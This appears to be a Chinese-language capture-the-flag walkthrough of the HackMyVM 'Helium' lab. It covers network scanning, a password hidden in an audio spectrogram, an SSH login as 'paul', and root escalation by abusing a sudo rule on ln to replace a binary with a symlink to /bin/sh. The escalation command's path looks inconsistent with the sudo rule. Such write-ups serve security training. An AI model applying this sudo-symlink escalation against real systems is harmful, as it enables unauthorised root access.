0%

HackmyVM-Helium

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.178 08:00:27:d1:eb:7a PCS Systemtechnik GmbH
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)
192.168.31.217 b4:0f:b3:8e:31:07 vivo Mobile Communication Co., Ltd.
192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 5 responded

ip是192.168.31.178,nmap扫描一下端口

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.178 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-26 01:27 EST
Nmap scan report for helium (192.168.31.178)
Host is up (0.0046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D1:EB:7A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 20.85 seconds

80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.178
<title>RELAX</title>
<!doctype html>
<html lang="en">

<!-- Please paul, stop uploading weird .wav files using /upload_sound -->

<head>
<style>
body {
background-image: url('screen-1.jpg');
background-repeat: no-repeat;
background-attachment: fixed;
background-size: 100% 100%;
}
</style>
<link href="bootstrap.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>

<body>
<audio src="relax.wav" preload="auto loop" controls></audio>
</body>

有注释paul可能是ssh的账号,relax.wav下载下了之后没有东西,/bootstrap.min.css给了一个wav文件,用Audacity分析频谱能发现dancingpassyo,ssh登录试试,登录成功

提权

1
2
3
4
5
6
7
paul@MiWiFi-RA71-srv:~$ sudo -l
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
Matching Defaults entries for paul on MiWiFi-RA71-srv:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paul may run the following commands on MiWiFi-RA71-srv:
(ALL : ALL) NOPASSWD: /usr/bin/ln
1
2
3
4
paul@MiWiFi-RA71-srv:~$ sudo ln  -fs /bin/sh /bin/usr/ln
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
# id
uid=0(root) gid=0(root) groups=0(root)

提权成功